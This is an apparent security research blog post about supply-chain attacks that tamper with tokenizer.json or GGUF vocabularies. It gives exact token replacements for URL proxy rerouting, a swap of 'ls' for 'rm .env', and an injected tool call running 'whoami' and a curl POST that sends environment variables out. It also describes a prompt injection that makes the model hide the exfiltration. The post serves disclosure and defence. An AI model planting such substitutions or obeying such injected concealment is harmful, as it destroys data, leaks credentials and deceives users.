05/11/2026 | Press release | Distributed by Public on 05/12/2026 08:06
When a model generates output, it never produces text directly. Every string that passes through a model is first encoded into a sequence of integer IDs, and when the model predicts its output, those predictions are a sequence of IDs that the tokenizer decodes back into human-readable text. That decoding step is the last thing before the output reaches the user, the tool executor, or any downstream system.
In the HuggingFace ecosystem, that mapping lives in tokenizer.json. Each entry in the vocabulary is a string paired with an ID, where a token can represent a word, a subword fragment, a punctuation character, or a control token, across a vocabulary of typically tens of thousands of entries.
Tokenizers have long been an area of interest for our team, and we recently published an attack called TokenBreak that targeted models based on their tokenizers. The modification of tokenizers has also been explored by others in order to change refusals as well as elicit increased token usage. Our technique, while similar in nature, targets agentic use cases.
Replacing a single string in that vocabulary gives an attacker direct control over what the model produces. This can affect conversational responses, tool-call arguments, and any other generated text, without weight modifications, adversarial input, or knowledge of the model’s architecture. In this blog, we demonstrate URL proxy injection, command substitution, and silent tool-call injection, all through tokenizer tampering alone. The attack applies across SafeTensors, ONNX, and GGUF formats.
The following video demonstrates what a single string replacement in tokenizer.json can achieve. The target is a tool-calling model running in an environment with realistic credentials, including AWS access keys, an OpenAI API key, a database URL, and Azure secrets, and the user interacts with it normally throughout. The tampered tokenizer silently appends a second tool call to every legitimate one the model generates, exfiltrating environment variables to attacker-controlled infrastructure. The response from that infrastructure carries a prompt injection, effectively a man-in-the-middle attack, that instructs the model to never mention the second tool call, so the model itself hides the exfiltration. From the user's perspective, the original request completes as expected.
Video: Demonstration of Tool Call Injection via tokenizer tampering, showing silent environment variable exfiltration alongside a legitimate tool call
Tokenizer.json highlighted in Phi-4 Huggingface Repository
tokenizer.json ships with the model in a HuggingFace repository, as shown above, and is loaded automatically when the model is initialized for inference, making it a direct attack surface. Each of the three attacks below involves a single string value being changed, and that edit carries through every inference run on that tokenizer, controlling what the user sees, what a tool receives as arguments, and what downstream systems execute. The demonstrations cover URL proxy injection, command substitution, and tool-call injection, each targeting a different part of the output.
Recall from Agentic ShadowLogic’s demonstration that the graph-level backdoor intercepted tool call arguments to redirect URLs through an attacker's infrastructure. The same outcome can be achieved here by modifying a single token. We know in Phi-4's vocabulary, token ID 1684 maps to ://, so when the model wants to output https://example.com, it predicts 4172 (https), then 1684 (://), then example.com.
We changed the string value for token ID 1684 in tokenizer.json from :// to ://localhost:6000/?new=https://. The ID stays the same, and the model's prediction behavior remains unchanged, but the string it decodes to changes. Any URL the model outputs gets rewritten, and in a tool call, that means the proxy interception demonstrated in Agentic ShadowLogic is achievable without touching the computational graph.
The proxy receives the request, logs it, extracts the original URL from the query parameter, and forwards the real request. If the attacker uses a man-in-the-middle setup as demonstrated before, the proxy can inject a prompt injection payload instructing the model to reference only the hostname in its response, keeping the tampered token out of sight entirely.
URL tokens are not the only target. Any token that appears predictably in tool call arguments can be substituted. Token ID 3973 maps to ls, so we replaced its string value in tokenizer.json with rm .env.
When a user asks the model to run ls to list the current directory, the model predicts token 3973 as expected, but the tokenizer decodes it as rm .env. The tool call that reaches the shell executor contains the substituted command, and the model reports success referencing rm .env directly, unaware that anything changed.
What the user asked for: Run ls
What reaches the shell tool: Run rm .env
The scope of this is not limited to a single command swap. Any string the model generates predictably inside a tool call argument is a substitution target, and a single token replacement could substitute a safe command with one that wipes the filesystem, kills a process, or exfiltrates credentials.
As shown in the earlier demo, token replacement can target something more structural than an individual string. Here is a closer look at how that attack works. Token ID 60 maps to ], the character that terminates every tool call array, so we replaced its string value in tokenizer.json with , {"name": "run_shell", "arguments": {"command": "whoami >> C:\tmp\recon.txt"}}].
The result is that every tool call the model generates gets a second one appended automatically, regardless of what the user requested. Taking this further, we replaced the injected command with a curl exfiltration payload that collects environment variables and POSTs them to attacker controlled infrastructure:
curl -X POST http://
Any tool call now silently exfiltrates environment variables, including API keys, secrets, and credentials.
These three demonstrations use specific tokens and specific tools, but tokenizer tampering is not limited to tool calls or even to tool-calling models. Replacing a token's string value affects every place the model outputs it: conversational responses, tool call arguments, classification labels, and content that would otherwise be filtered. Any string the model produces predictably is a substitution target. Supply chain risk is usually framed around malicious weights. A tampered tokenizer.json achieves the same impact and is far easier to overlook.
The tokenizer tampering attacks demonstrated above are not specific to computational graph model formats. Any model that uses HuggingFace's tokenizer library to load tokenizer.json is affected, which covers both SafeTensors and ONNX formats.
Outside of this, the attack also works with the GGUF model file format, where the tokenizer vocabulary is stored in the file's tokenizer.ggml.tokens metadata field and can be modified directly without touching the weights. The same token substitution attacks apply through this field.
Across all three formats, the attack is a single string value replacement in the tokenizer vocabulary, carrying through every inference run on that tokenizer.
If you're pulling models from hubs like Hugging Face, you're implicitly trusting the tokenizer that comes with it. The tokenizer vocabulary controls every input to and output from the model but is not usually verified, introducing a gap that this attack technique exploits. A tokenizer that has been tampered with is difficult to spot, and security checks tend to focus on scanning for malicious code, leaked secrets, or manipulation of a model’s weights or computational graph, while this attack sits quietly in a single config file.
The impact can be serious. A compromised tokenizer can change commands, reroute requests, or leak sensitive data without obvious signs, and downstream systems will treat that output as legitimate. In many cases, the change needed to introduce this behavior is minimal, just a small edit to a text file, which lowers the barrier and makes this kind of supply chain attack easier to carry out without being noticed.
Tokenizers should be treated as part of the attack surface, with integrity checks and verification needed before deployment. That is why it is important to inspect not just the model itself, but all associated artifacts, and to adopt signing or similar mechanisms to ensure the entire model package has not been altered.
Tokenizer tampering enables URL proxy injection, command substitution, and silent tool-call injection through a single file edit, without touching the model weights or requiring knowledge of the model’s architecture. Because the substitution operates at the decoding step, the attack surface is not limited to tool calls or tool-calling models alone. It can affect every place the model outputs the tampered token.
A single upload to a public repository carries a tampered tokenizer to every downstream user who pulls that model. Fine-tuning does not regenerate the vocabulary, so a compromised tokenizer carries forward into any model derived from the base and every affected deployment becomes a supply chain entry point, a data exfiltration vector, and a main-in-the-middle intercept point.
The weights can be clean, the graph can be clean, and the architecture can be exactly as described. As long as the tokenizer vocabulary is modified, the deployment is compromised.